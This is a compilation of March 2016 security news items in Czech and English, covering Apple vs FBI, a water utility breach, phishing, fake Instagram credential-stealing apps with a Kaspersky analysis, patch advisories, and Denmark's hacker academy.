Apple zatím bojuje s příkazem federálního soudu, aby vytvořil speciální verzi iOS 9, která by odstranila bezpečnostní opatření na iPhonu 5c, používaný Syedem Rizwanem Farookem, strůjcem masakru v San Bernardinu.
Naplnění rozsudku se obává mnoho technologických společností, neboť by vládě poskytl snadný způsob, jak podkopat šifrovací systém jejich produktů.
Americký úřad spravedlnosti v pondělí uvedl, že pátrá po jiných možnostech, jak se dostat to iPhonu Farooka. V tom případě by pomoc Applu stát nepotřeboval.
Perry dále napsal, že společnost Tor Project „stojí za Applem a jeho rozhodnutím bránit šifrování a odporovat tlaku vlády. Nikdy nevytvoříme zadní vrátka pro náš software.“
Tor, zkratka pro The Onion Router („cibulový router“) je síť, která poskytuje anonymní přístup k internetu pomocí upraveného prohlížeče Firefox. Projekt započala Laboratoř pro námořní výzkum ve Spojených státech, ale teď ji řídí nezisková organizace Tor Project.
Prohlížení webu je šifrováno a zajišťováno skrze různé proxy servery, což výrazně stěžuje možnost zjistit skutečnou IP adresu počítače. Tor je životně důležitá aplikace pro aktivisty a disidenty, neboť poskytuje silnou vrstvu soukromí a anonymity.
Některé z funkcí Toru však využili též kriminální živly, především kyberzločinci. To vyvolalo zájem u bezpečnostních agentur po celém světě. Tisíce webů běží skrytě na systému Toru a mají speciální „.onion“ URL; dá se tak na ně připojit pouze skrze upravený prohlížeč.
The Silk Road, „hedvábná stezka,“ byl undegroundový, částečně ilegální trh, zavřený FBI v říjnu 2013. Šlo o jednu z nejznámějších služeb, využívajících pro svou činnost právě Tor.
FBI may have found a New Way to Unlock Shooter's iPhone without Apple
23.3.2016 Apple
There's more coming to the high-profile Apple vs. FBI case.
The Federal Bureau of Investigation (FBI) might not need Apple's assistance to unlock iPhone 5C that belonged to San Bernardino shooter, Syed Rizwan Farook.
If you have followed the San Bernardino case closely, you probably know everything about the ongoing encryption battle between the FBI and Apple.
In short, the US Department of Justice (DOJ) wants Apple to help the FBI create a backdoored version of its iOS operating system that could let it access data on Farook's locked iPhone 5C.
Apple, meanwhile, is evident on its part, saying that the FBI wants the company to effectively create the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
FBI to Apple: We'll Unlock iPhone by Our Own
Now the Feds say they may be able to crack the iPhone without the Apple's assistance after all.
In a court filing [PDF] submitted on Monday in a central California federal court, the DOJ requested a motion to cancel a Tuesday hearing and to suspend the proceedings at least until next month.
United States Magistrate Sheri Pym, the judge who previously ordered Apple to help the FBI unlock the encrypted iPhone, granted the request.
The cancelled hearing is because the FBI wants some time to test an alternate method for unlocking the shooter's iPhone that will not involve Apple building a backdoored iOS version.
Although the DOJ declined to comment on who is providing help to the FBI, this doesn't mean the case has been closed because the Feds still have to make sure their new technique will work.
"On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook's iPhone," the motion reads.
"Testing is required to determine whether it is a [feasible] method that'll not compromise data on Farook's iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case."
FBI Wants Encryption Backdoor to Unlock More iPhones
The Feds likely already discovered this alternative method, but sought Apple's help to create a backdoor so that they could exploit the precedent for solving other pending cases, as the agency is seeking Apple's help to unlock iPhones in at least nine other cases.
But, there are some points the FBI must keep in mind before trying their alternate way to get into Farook's iPhone 5C.
If you copy the hard drive, all the data from the iPhone will remain scrambled, which will be of no use.
If you enter 10 wrong passwords, the whole iPhone will be wiped off, which means if your method fails, you'll never recover the data from the shooter's iPhone.
However, if the FBI method isn't able to unlock Farook's iPhone, the agency will again have to go back to the court to enforce the order on Apple.
Who, according to you, is this outside party?
Hacker? Security researcher? Or some Cyber-forensic expert? Let us know in the comments below.
Cyber attacks on systems at a water utility, a scaring reality
23.3.2016 Computer Attack
According to the recent Verizon breach digest for March 2016 hackers breached a water utility and manipulated systems for water treatment and flow control.
The story that I’m telling you is very disturbing, according to the Verizon breach digest for March 2016 a group of hackers breached a water utility and manipulated systems for water treatment and flow control.
The Verizon breach digest reports a number of cyber attacks including one against an unnamed water utility, described in the document as the Kemuri Water Company (KWC).
The operator behind the water utility hired Verizon to assess its systems, during the investigation the experts discovered evidence of cyber attacks.
The experts discovered a desolating situation, a number of systems affected by critical vulnerabilities were publicly exposed on the Internet and the overall architecture was including outdated operation technology (OT) systems.
“The OT end of the water district relied heavily on antiquated computer systems running operating systems from ten plus years ago.” states the report.
The entire control infrastructure was relying on an IBM AS/400 system, a system dated 1988, that was used by the operator to control every OT device in the facility (i.e. valve and flow control applications) and IT functions (i.e. billing). More disconcerting the fact that a single employee, or an attacker, could manage the entire utility by accessing the IBM AS/400 system. If a data breach were to occur at KWC, this SCADA platform would be the first place to look.
“Even more concerning, many critical IT and OT functions ran on a single AS400 system. KWC referred to this AS400 system as its “SCADA platform.” This system functioned as a router with direct connections into several networks, ran the water district’s valve and flow control application that was responsible for manipulating hundreds of Programmable Logic Controllers (PLCs), housed customer PII and associated billing information, as well as KWC’s financials.”
Experts discovered that the KWC facility was targeted by hacktivists had that breached the internal architecture by exploiting a vulnerability in the payment application web server.
Once compromised the server, the attackers obtained the internal IP address and admin login credentials for the AS/400 system, this information was used to steal 2.5 million records containing customer and payment data. Fortunately the attackers haven’t used the stolen data to carry on fraudulent activity.
By accessing the AS/400 system the attackers were also able to completely gain control over water flow and the amount of chemicals used to treat the water.
During the 60-day period of the assessment, the experts discovered four connections to systems at the water utility. The threat actors modified application settings, fortunately without having the necessary knowledge to cause serious damage. The good news is that alerting systems allowed an early identification of any anomaly in controlled processes.
Now image possible effects of a cyber-attack launched by a persistent nation-state attacker with a deep knowledge of the internal process at the water utility.
Internetové bankovnictví bylo uzamčeno, zkouší podvodníci nový trik
23.3.2016 Phishing
Nový trik zkouší podvodníci, kteří se vydávají za zaměstnance České spořitelny. Uživatelům tvrdí, že bylo jejich internetové bankovnictví uzamčeno. Snaží se je tím přimět ke kliknutí na falešný odkaz, aby z nich mohli vylákat přihlašovací údaje. Před novými phishingovými zprávami varovali zástupci České spořitelny.
FOTO: Česká spořitelna
Právě na klienty spořitelny nový podvod cílí. „Dosáhli jste maximálního počtu neúspěšných pokusů o přihlášení. Pro vaši ochranu byl přístup k on-line službě uzamčen,“ tvrdí podvodníci v nevyžádané zprávě.
Na konci textu je pak odkaz, prostřednictvím kterého je údajně možné přístup obnovit a pokračovat v procesu ověření. Tak z důvěřivců snadno vytáhnou i potvrzovací SMS zprávu, díky které pak uskuteční libovolnou platbu.
Pozornější podvod odhalí
I když grafika podvodného mailu skutečně připomíná službu Servis 24, tedy internetové bankovnictví České spořitelny, pozornější uživatelé mohou snadno odhalit, že jde o podvod. Zpráva totiž obsahuje řadu chyb, některým slovům například chybí zcela diakritika.
„Buďte k e-mailům z neznámých zdrojů velmi obezřetní. Pokud máte podezření, že jste podvodný e-mail obdrželi, v žádném případě nereagujte na jeho obsah, neklikejte na odkaz, který může být jeho součástí, a zprávu nám přepošlete na e-mailovou adresu phishing@csas.cz. Jestliže jste již na odkaz klikli a vyplnili požadované údaje, ihned kontaktujte klientskou linku České spořitelny na bezplatném telefonním čísle 800 207 207,“ poradili zástupci banky.
Stejně by lidé měli postupovat i v případě, že jim nevyžádaná zpráva přijde s hlavičkou jiné bankovní instituce. Měli by se tedy vždy obrátit na svou banku.
FBI may have found a New Way to Unlock Shooter's iPhone without Apple
22.3.2016 Apple
There's more coming to the high-profile Apple vs. FBI case.
The Federal Bureau of Investigation (FBI) might not need Apple's assistance to unlock iPhone 5C that was belonged to San Bernardino shooter Syed Rizwan Farook.
If you have followed the San Bernardino case closely, you probably know everything about the ongoing encryption battle between the FBI and Apple.
In short, the US Department of Justice (DOJ) wants Apple to help the FBI create a backdoored version of its iOS operating system that could let it access data on a locked iPhone 5C belonged to Farook.
Apple, meanwhile, is evident on its part, saying that the FBI wants the company to effectively create the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
FBI to Apple: We'll Unlock iPhone by Our Own
Now the Feds say they may be able to crack the iPhone without the Apple's assistance after all.
In a court filing [PDF] submitted on Monday in a central California federal court, the DOJ requested a motion to cancel a Tuesday hearing and to suspend the and proceedings at least until next month.
United States Magistrate Sheri Pym, the judge who previously ordered Apple to help the FBI unlock the encrypted iPhone, granted the request.
The cancelled hearing is because the FBI wants some time to test an alternate method for unlocking the shooter's iPhone that will not involve Apple building a backdoored iOS version.
Although the DOJ declined to comment on who is providing help to the FBI, this doesn't mean the case has been closed because the Feds still have to make sure their new technique will work.
"On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook's iPhone," the motion reads.
"Testing is required to determine whether it is a [feasible] method that'll not compromise data on Farook's iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case."
FBI Wants Encryption Backdoor to Unlock More iPhones
Probably the Feds already had this alternative method with themselves, but they were seeking Apple's help to create a backdoor for them so that they could exploit it to solve other pending cases, as the agency is seeking Apple's help to unlock iPhones in at least nine other cases.
But, there are some points the FBI must keep in its mind before trying their alternate way to get into Farook's iPhone 5C.
If you'll copy the hard drive, all the data from the iPhone will remain scrambled, which will be of no use.
If you'll enter 10 wrong passwords, whole iPhone will be wiped off, which means if your method gets failed, you'll never recover the data from the shooter's iPhone.
However, if the FBI method isn't able to unlock Farook's iPhone, the agency will again have to go back to the court to enforce the order on Apple.
Who, according to you, is this outside party?
Hacker?, Security researcher? Or some Cyber-forensic expert? Let us know in the comments below.
The FBI might be able to crack the San Bernardino terrorist’s iPhone without Apple’s help
22.3.2016 Apple
The US authorities announced on Monday they may have found a way to unlock the San Bernardino shooters iPhone without the Apple’s help.
The FBI says it may have discovered a method to bypass Apple security measures and unlock access the iPhone used by one of the San Bernardino attackers, and a today scheduled court hearing in the case has been postponed.
We have discussed a lot on the case FBI vs Apple, last week DOJ released a brief filing that threatens to force Apple to hand over the iOS source code if it will not help FBI in unlocking the San Bernardino shooter’s iPhone, meanwhile Edward Snowden accused the FBI of lying about his ability to unlock the mobile device.
The legal battle between Apple and the FBI raised the debate about the implementation of strong encryption in commercial products, a design choice that doesn’t allow authorities to conduct crime investigations. On December 2015, Hillary Clinton called tech companies to create a Manhattan Project for Encryption.
Now it seems that we are at the terminus, on Sunday, March 20, 2016, an independent party demonstrated to the US authorities a technique for unlocking the controversial iPhone.
“On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook’s iPhone,” revealed the lawyers for the US Government in a court filing Monday afternoon. “Testing is required to determine whether it is a viable method that will not compromise data on Farook’s iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case,”
The court filing doesn’t provide technical details on the technique, but this could represent the end of the fights, at least one important truce. Several third parties provided the FBI a number of suggestions for how it could crack the iPhone.
San Bernardino case Apple vs FBI
Apple is also worried that the San Bernardino case could set a legal precedent that would force IT giants to provide government access to users’ data even when these are protected by encryption.
In a court filing Monday, the FBI confirms that its experts have continued to look for a method to crack iPhone devices, even without the Apple’s help.
“Our top priority has always been gaining access into the phone used by the terrorist in San Bernardino,” explained the Justice Department spokeswoman Melanie Newman. “With this goal in mind, the FBI has continued in its efforts to gain access to the phone without Apple’s assistance, even during a month-long period of litigation with the company.”
Many experts speculate the FBI plans to access data by cloning the device until it is not able to guess the secret passcode. Basically, the experts will make an attempt to find the password for each against each copy.
Anyway, whatever method FBI will use, the government will file a status report by April 5, reveal the results of the procedure.
The unique certainly at the moment is the suspension of the order requiring Apple to help the FBI.
On the other side, Apple’s lawyers confirmed that the company will never provide help to the FBI.
Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro
22.3.2016 Crime
Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro, it is a terror attack. Panic and chaos in the city. The IS claims the responsibility for the attack.
This morning the Europe has fallen again in terror, just months after the Paris attacks a new wave of attacks hit the West. This morning a sequence of explosions have been detonated at Brussels Airport in an alleged suicide bomber terror attack.
“We can confirm that there have been two explosions in the departure hall. We called the emergency services on the ground – they [are] now provid[ing] first aid to the injured.” said Anke Fransen, spokeswoman for the Brussels Airport.
The first two Brussels explosions have hit the departure hall at the international Zaventem airport shortly before 8am, next to the American Airlines check-in desk. Other explosions have been detonated at the Schuman and Malbeek metro station, not far from the EU headquarters. The explosions at a metro station in Maalbeek occurred one hour later.
Brussels explosions maps
Source FT.com
A government source confirmed to VRT broadcaster that it was a terror attack, the number of victims is increasing minute after minute, last news reports at least 34 dead and hundreds people injured.
“A Belgian news agency is reporting that shots were fired and words in Arabic were heard being shouted before the blasts.” reported the British Mirror.
Brussels explosions
Source FT.comr.
Local authorities are inviting people to not come near the area under attack.
Brussels Airport’s Twitter account told followers: “There have been 2 explosions at the airport.
Local media reported that as many as 14 people were killed at the airport, with hundreds injured, and 20 killed at the metro station. These numbers are not official and must be confirmed by the authorities.
The Brussels explosions come only a day after the Belgium’s interior minister, Jan Jambon, warned possible terror attacks after the recent arrest Salah Abdeslam, one of the participants of the Paris terror attacks.
My thoughts are with the people of Brussels following these ignoble attacks.
From a cyber security perspective, I invite all to remain vigilant, crooks will try to exploit the media attention on the Brussels explosions sharing bogus videos and malicious link. It is likely we will detect a phishing campaign trying to exploit the event.
Tor Project and the new anti-tampering measures for its software
22.3.2016 Security
Tor Project revealed how the organization has conducted a three-year long work to improve its ability to detect fraudulent software.
The experts at the Tor Project are working to improve the resilience of the anonymizing network to cyber attacks, in particular, they aim to quickly detect any surveillance activity conducted by tempering the Tor system.
The researchers fear that the US Government could interfere with the Tor project by requesting the organization to turn over critical information that would compromise the security of the network and cause in de-anonymization of the users.
Mike Perry from the Tor Project, highlighted that the organization has never received a legal demand to place a backdoor in its source code, nor have we received any requests to hand over cryptographic signing material.
directory authorities Tor network 2Tor Project
The Tor Browser is an open source, this means that everyone could analyze it, the organization also implements several mechanisms to ensure the security and integrity of its software.
Now the experts want more, they are exploring further improvements to eliminate single points of failure, so that even if a threat actor obtains our cryptographic keys, the anonymizing network would be able to detect the anomalous activity. The development team behind the Tor Project is designing the system in such a way to make visible any change to the original source code.
“For this reason, regardless of the outcome of the Apple decision, we are exploring further ways to eliminate single points of failure, so that even if a government or a criminal obtains our cryptographic keys, our distributed network and its users would be able to detect this fact and report it to us as a security issue.” wrote Mike Perry.
“From an engineering perspective, our code review and open source development processes make it likely that such a backdoor would be quickly discovered.” he added.
To distribute a tampered version of the Tor Browser it would be required the access to two cryptographic keys:
the SSL/TLS key that secures the connection between a user and Tor Project servers; plus the key used to sign a software update.
the key used to sign a software update;
“Right now, two keys are required, and those keys are not accessible by the same people,” explained Perry. “They are also secured in different ways.”
Even if a persistent attacker is able to obtain the two keys, in theory, users would be able to check the software’s hash and discover any modification by checking it.
Who Viewed Your Profile on Instagram? Obviously, Hackers!
22.3.2016 Hacking
Are you curious about who viewed your profile on Instagram?
This is probably the most frequently asked question nowadays, and there are several applications available on Google Play Store and Apple App Store, which claims to offer you the opportunity to see who is looking at your Instagram profile.
But, should we believe them?
Is there really some kind of way out to know who viewed your Instagram profile?
The shortest answer to all these questions is 'NO', such functionality does not exist on Instagram at the moment.
But, thousands of users still have hope and hackers are taking advantage of this to target a broad audience.
Recently, security researchers have discovered some malicious applications on Android Google Play Store as well as iOS App Store, which are entirely a hoax, targeting Instagram users.
Who-Viewed-Me-on-Instagram
The iOS app is named "InstaCare - Who cares with me?" and is one of the top apps in Germany, while the Android app is dubbed "Who Viewed Me on Instagram" that has more than 100,000 downloads and 20,000 reviews.
Both the apps are developed by Turker Bayram – the same developer who created the malicious "InstaAgent" app for Android and iOS platform late last year that secretly stole users’ Instagram credentials.
The recent applications by Bayram also have the same functionality, luring Instagram users into believing that the app would let them know who viewed their profile. The app claims to:
Show you up to most recent 100 lists for your Instagram profile.
Display your friend list in order, who cares your profile most with your profile interaction.
But in reality…
The malicious apps abuse the authentication process to connect to Instagram and steal user's Instagram username and password, according to a blog post published by David Layer-Reiss from Peppersoft.
Since third party applications use API to authenticate themselves with the legitimate apps, users generally provide their same credentials to authenticate with different applications and services.
Here's How an App Can Hack Your Instagram Accounts
Today, it is quite easy for hackers to target large audience – Just abuse the name of a popular application and give users option beyond the legitimate one.
Users will simply provide their critical data, including their credentials, without knowing its actual consequences.
Once users install 'InstaCare' or 'Who Viewed Me on Instagram' on their iOS or Android device, they are immediately served a login window that forced victims to log in with their Instagram credentials.
Since the apps advertise itself to show you who viewed your Instagram profile, most users fall victim to the apps and enter their account credentials without a second thought.
The usernames and passwords are then encrypted and sent to the attacker's server. The attacker will then use those credentials later to secretly log on and take full control of the hacked Instagram accounts and post spams on the user's behalf.
Security researchers from Kaspersky Labs also confirmed David's findings. You can refer Kaspersky's blog post for more technical details on the malicious apps.
At the time of writing, neither Apple nor Google has removed the malicious apps from their official App Stores, which means that the malicious apps are still available to users for download.
who-viewed-my-profile-on-Instagram
It's not at all surprising that the play stores are surrounded by a number of malicious apps that may gain users' attention to fall victim for one.
But, the fact that both Apple and Google got fooled again by the same developer shows how hard it is to keep an eye on a developer who already published a malicious app and to manage the app stores in a secure manner.
Here's How to Protect Yourself
If you've already installed one of these apps and have now seen the error of your ways, and remove the culprit from your apps list too.
So if you have already fallen victim to this scam, hurry up!
Uninstall the apps mentioned above from your smartphone if you have one.
Change your Instagram password immediately.
For better security, enable two-factor authentication on your Instagram account.
Who viewed your Instagram account? And who stole your password?
22.3.2016 Zdroj: Kaspersky Hacking
Mobile applications have become one of the most efficient attack vectors, and one of the favorite methods of cybercriminals is the abuse of popular applications. Maybe you would think twice before installing any application that asks for the credentials you use to connect to your social networks, email accounts or cloud storage services?
Recently, a malicious application called “InstaCare – Who cares with me” was released via Google Play Store and App Store. David Layer-Reiss from Peppersoft, a mobile development company from Germany who discovered this threat, provided a good analysis on his blog.
This application serves as a hook to lure Instagram users, pretending to let them know who has viewed their profile; but in reality it abuses the authentication process to connect to Instagram.
In fact, it’s common for many applications to use API’s or authorization protocols such as OAuth to authenticate with third-party applications. This is very convenient for users as they can use the same credentials to authenticate with different applications and services.
The problem here is that this feature can be used maliciously for some applications to gain access to the user’s information, such as their profile and contacts, or to steal their credentials.
This isn’t the first time that this has happened. Last year we published some blog posts outlining where attackers had used malicious applications or email campaigns. Either to steal the user’s credentials – Stealing to the sound of music; or just to get access to user information – Fraudsters can have rights, too; sometimes using popular applications as a cover – Del phishing al acceso persistente (Spanish).
This kind of strategy is very successful. In this particular case, the Android version of this application alone was installed on more than 100K devices with more than 20K reviews, most of them saying that you have to pay in order for it to work correctly.
As with Google Play, we can also find some users in the App Store complaining about problems after installing this app.
It is interesting that this application was able to pass the Apple security checks and was published without any problem, even though its controls are more restrictive, without mentioning that apparently this developer already had a history of having published a malicious application before.
Attack vector
This attack installs JavaScript code into the Submit button on the Instagram login page as soon as the page has finished loading.
This code gets the content of the input fields named “username” and “password” and stores it in the local variable named “str” with the pattern “<username>,-UPPA-,<password>”. After that, it calls the function “processHTML” which stores the collected data in a class variable.
Other information is also collected from the user’s device and sent to the C&C via a POST request.
The value of the parameter “hash” is the data shown in the image above plus the Instagram username and password. This value is encrypted with AES 128 and then encoded with base64. The encryption key is generated from the ID generated by the server.
Do you want to know who viewed your Instagram account? How about your password?
The iOS version also uses AES 128 but the block cipher mode used is CBC instead of ECB.
Consequently, it uses as Initialization Vector (IV) the string “IOS123SECRETKEYS”.
Once opened it forces the user to login to Instagram.
After that the username and password are sent to the server, as well as some metadata.
Since we have the ID, we can decrypt the content by using a modified version of the Java code published by David. We just need to modify the crypto class initialization
By inputting the content of the “hash” parameter, we can decrypt the data send and find out with information has been sent to the server. As expected, the Instagram username and password is also included in this list.
The username and password will later be used to post spam messages to the user’s Instagram account.
The threats mentioned in this blog post are detected by Kaspersky Lab products as HEUR:Trojan-Spy.AndroidOS.Instealy.a and HEUR:Trojan-Spy.IphoneOS.Instealy.a.
Conclusion
Mobile environments are one of the best targets for cybercriminals; they usually have access to email accounts, social networks, contacts and even the places you have visited.
The use of social networking is one of the best ways to distribute malicious content. We have to be aware of unknown applications that promise something that isn’t provided by the service that we are using. Usually, if the feature does not exist on the service website, it will be hard for third-party software to provide it.
Thank you, CanSecWest16!
22.3.2016 Zdroj: Kaspersky Safety
This year, we had the absolute pleasure of being a part of CanSecWest’s fantastic lineup of talks, well-rewarded pwnage, and entertainment among a jovial crowd of infosec practitioners of every stripe. The diversity of the crowd really cannot be overstated as your usual network defenders, hardware and software developers, threat intelligencers (like ourselves) are peppered in with a fair amount of exploit developers sizing up their competition. This year’s Pwn2Own awarded a whopping $460,000 to four out of five teams for successful exploitations of Google Chrome, Microsoft Edge, and Apple Safari browsers. Of these, Tencent Security’s Team Sniper took the lead and the title of ‘Master of Pwn’ embroidered in a pretty sweet purple smoking jacket. We only wished someone would have mastered the always difficult “VM escape”.
The mix of talks was heavily skewed towards exploitation with some very interesting vulnerabilities discussed like Haifei Li and Chong Xu’s talk on Microsoft Outlook security. This talk should’ve scared the pants off of anyone in the crowd as Haifei demoed his now patched BadWinMail exploit that allowed the mere preview of an email on outlook to pop calc.exe. This is the sort of exploit that reminds us that all of the tips and explanations we give end users don’t carry that much weight in the face of a truly advanced attacker with a sense of creativity. There were no links clicked or attachments executed, in some cases (if the malicious email is the latest received when Outlook is first run) the application will preview the malicious email without user interaction required. Zooming out a little bit, we should consider that even though many threat actors are moving away from fancy exploits (finding that inexpensive phishing or macro-laced documents provide good enough results), this is the sort of exploit that the 1% threat actors absolutely love. So perhaps the immediate takeaway should be: “Why the hell isn’t Outlook sandboxed?”
While the majority of the talks focused heavily on exploitation and vulnerabilities, our talk dealt with the usage of false flags and deception techniques by well-known (and some unknown) APT actors. We were skeptical we could hold a full crowd given the skew towards vuln-centric talks, but were pleasantly surprised by the turnout and the warm reception. As we took the crowd through a brief overview of attribution, pitfalls encountered, and techniques being utilized by the bad guys, it was clear to us this topic has not received enough attention in the community. The questions asked during and after the presentation focused mainly on opinions as to whether or not attribution is even needed in the grand scheme of things. While we don’t want to give away our secret sauce just yet (as this is an ongoing project), some of the actors we focused on included Cloud Atlas (AKA Inception Framework), Turla, Lazarus, Sofacy, big bad Duqu, and perhaps a new player. Stay tuned for a very thorough treatment of this topic.
CanSecWest has become a true favorite with GReAT researchers for its welcoming atmosphere and diverse but friendly crowd open to new research topics and hard discussions on ongoing problems. It’s rare to find such a great mix of people from all walks at a conference that isn’t so large or overly commercial. We are looking forward to CSW 2017! Won’t you join us?
Google issued an emergency patch for critical CVE-2015-1805 flaw
22.3.2016 Vulnerebility
Google released an emergency security patch to fix the local elevation of privilege vulnerability CVE-2015-1805 affecting its OS.
Google has released an emergency security patch to fix the local elevation of privilege vulnerability CVE-2015-1805 affecting the kernel of the Android OS of certain devices.
The vulnerability is ranked as critical and can be exploited by rooting applications that users have installed on their devices to elevate privileges and run arbitrary code on the vulnerable device.
The security flaw is very old, it was discovered in the upstream Linux kernel years ago and fixed in April 2014. Unfortunately, the flaw was underestimated until last month when the C0RE Team reported to Google that it was possible to exploit it to target the Android OS.
All unpatched Android devices running OS based on kernel versions 3.4, 3.10 and 3.14, including all Nexus devices are vulnerable to the CVE-2015-1805 vulnerability, meanwhile devices based on Linux kernel version 3.18 or higher are not affected.
Nexus Rooting CVE-2015-1805
Google has already blocked the installation of software that triggers the flaw, both within Google Play and outside of Google Play, through Verify Apps.
“We already block installation of rooting applications that use this vulnerability — both within Google Play and outside of Google Play — using Verify Apps, and have updated our systems to detect applications that use this specific vulnerability.” states the advisory issued by Google.”To provide a final layer of defense for this issue, partners were provided with a patch for this issue on March 16, 2016. Nexus updates are being created and will be released within a few days. Source code patches for this issue have been released to the Android Open Source Project (AOSP) repository.”
Google warns owners of vulnerable devices that could be permanently compromised by exploiting the flaw and in some circumstances, it could be necessary a re-flash of the operating system in order to remove malicious applications.
“An elevation of privilege vulnerability in the kernel could enable a local malicious application to execute arbitrary code in the kernel. This issue is rated as a Critical severity due to the possibility of a local permanent device compromise and the device would possibly need to be repaired by re-flashing the operating system.” continue the advisory.
Google has collected evidence of this vulnerability being abused on a Nexus 5 using a publicly available rooting tool, but there is no malicious exploitation of the security flaw.
Google created Nexus updates that will be released within a few days, the company has already notified its partners on this security vulnerability.
“Source code patches for this issue have been released to the Android Open Source Project (AOSP) repository.” states the advisory.
To mitigate the risk of exposure, users should have on their Android devices a security patch level of March 18, 2016, or a security patch level of April 2, 2016 and later.
Apple Updates Everything (Again)
22.3.2016 Vulnerebility
As part of today's product announcements, Apple released new operating systems across its different products. In addition to new features, these updates do address a number of security issues as well.
OS X Server 5.1 ( for Yosemite 10.10.5 )
This update improves warnings in case the administrator stores backups insecurely and removes old SSL ciphers (RC4). Also, authentication bypass issues are addressed in the Wiki.
Safari 9.1
The Safari update is available for OS X back to 10.9 (Mavericks). It fixes a total of 12 vulnerabilities, some can be used to execute arbitrary code.
OS X El Capitan 10.11.4 (Security Update 2016-002)
A total of 59 vulnerabilities are patched (I hope I counted them right). Here are some of the highlights:
Apple USB Networking (CVE-2016-1734): This vulnerability could lead to arbitrary code execution if a malicious USB devices is connected to the computer.
Bluetooth (CVE-2016-1735/1736): Bluetooth can be used to execute arbitrary code. It isn't clear (but likely) that you first need to pair with the device which would mitigate the problem somewhat.
Messages (CVE-2016-1788): This vulnerability, which would allow the interception of iMessage messages has gotten a lot of press in the last couple days.
OpenSSH (CVE-2016-0777,0778): The roaming vulnerablity that could lead to a leak of the private key is fixed in this patch.
Wi-Fi (CVE-2016-0801/0802): A malicious WiFi frame could be used to execute arbitrary code. Since this requires an unspecified ether type, I am assuming that this requires that the victim first associates with the network. But the advisory doesn't provide sufficient details to tell for sure.
XCode 7.3:
Two vulnerabilities. One in otool (a tool to display object files) and another two vulnerabilities in subversion.
WatchOS 2.2:
A lot of overlap here with the OS X and Safari patches. Note that the Watch is also vulnerable to the WiFi exploits, but not the Bluetooth issues.
iOS 9.3:
A total of 36 vulnerabilities, many of which are also patched for OS X. The Wifi vulnerability applies to iOS just as for the WatchOS and OS X.
TVOS 9.2
Again a lot of overlap with the other updates.
In short: patch...
For details from Apple, please refer to the usual security bulletin page: https://support.apple.com/en-us/HT201222
Coming soon, Denmark’s intelligence presents the Danish Hacker Academy
21.3.2016 Hacking
The Danish intelligence agency PET (Politiets Efterretningstjeneste) plans to start its Danish hacker academy to fight threat actors in the cyberspace.
Denmark’s PET (Politiets Efterretningstjeneste), the country’s intelligence agency, announced last week plans to create a government ‘hacker academy’ in response to the need to improve country cyber security.
The Danish hacker academy is a hacking school that will train black hat hackers for offensive and defensive purposes starting from August 1, 2016.
The Danish security and intelligence service PET will recruit talented IT nerds interested in supporting the activities of the Danish Government in the cyber space. The PET is worried by the militarization of the cyberspace state, foreign governments could use cyber tools for offensive purpose aimed to cyber espionage and sabotage.
The Danish intelligence also plans to train its cyber army against terrorist organisations online.
The Danish Government has launched a media campaign using the following the slogan:
“Have you got what it takes to become a member of a secret elite unit?”
Danish hacker academy
Lars Findsen, the head of PET, is confident that Government experts could support the growth of talented nerds.
“This is not about fully-capable hackers – hopefully, there are not many of those out there, anyways – but about people who have the basic skills we can build on,” Findsen told Politiken.
The Danish hacker academy provides a training program includes three modules spread across four and a half months.
The first one is a basic module on the network and computer security, the second one is a module on defensive hacking, and the training closes teaching offensive hacking techniques to the participants.
The Danish hacker academy will be located in Copenhagen, but its location is still a mystery, all the participants that will successfully complete the training will be enrolled in PET’s Computer Network Exploitation team. But beware, only a privileged few will be selected annually.
“The selection process will be supervised by psychologists and PET’s own IT specialists and is based on the same recruitment process used for the elite commando frogman corps of the Royal Danish Navy.” states a post published by the PET online.
“Officially termed ‘network retrieval‘, in reality the recruits would be helping PET with cyber espionage against foreign powers, writes Politiken – a type of activity that would normally get you sent to prison.“
The experts at PET have no doubt, the Danish hacker academy will provide hacking excellences, high-skilled hackers that will form a new cyber army operating abroad and inside the country.
Metaphor – nová hrozba pro uživatele Androidů
21.3.2016 Viry
Další problém s multimediální knihovnou Androidu ohrožuje možná desítky milionů uživatelů.
Stagefright opět představuje riziko. Miliony zařízení s Androidem jsou opět v ohrožení poté, co byl objeven nový způsob jak zneužít díru v knihovně multimédií, kterou už Google v minulosti záplatoval.
Izraelská bezpečnostní společnost NorthBit slabinu pojmenovala Metaphor a zranitelná jsou podle ní všechna zařízení s Androidem 2.2, přes 4.0 až po 5.0 a 5.1. Nejvíc prý smartphony Nexus 5 se stock ROM a s určitými modifikacemi také HTC One, LG G3 a Samsung S5.
Jde přitom o podobnou chybu, jakou představovala ta s označením CVE-2015-3864, která byla poprvé objevena zkraje loňského roku bezpečnostní společností Zimperium. Google ji už dvakrát napravoval, přičemž podruhé tak s ohledem na možné ohrožení učinil relativně v tichosti.
Podle Zuka Avrahama, zakladatele Zimperia, tak aktuální report kolegů z NorthBit představuje značné riziko, jelikož jej mohou hackeři snáz zneužít. Zvlášť poté, co NorthBit postup úspěšného prolomení bezpečnostní chyby zveřejnil na videu.
Nic netušícímu uživateli stačí kliknout na škodlivý link a chvíli na dané webové stránce pobýt – společnost uvádí pár vteřin až dvě minuty – než škodlivý kód vykoná své dílo. Na zařízeních s Androidem 5.0 a 5.1 přitom zvládne prolomit i ASLR, tedy opatření, které má podobným útokům bránit.
Podle odhadů NorthBitu Android 5.0 a 5.1 v současnosti běží na zhruba 235 milionech zařízení, Android verze 2.x bez ASLR pak na 40 milionech zařízení. „Těžko ale odhadnout, kolik jich je vlastně v ohrožení,“ píše ve své zprávě.
Google loni v srpnu pod vlivem hrozby Stagefrightu přislíbil pravidelnější vydávání patchů a užší spolupráci s výrobci mobilních zařízení a i když nepřicházejí tak pravidelně, jak by někteří uživatelé očekávali, dá se předpokládat, že na aktuální problém zareaguje pohotově.
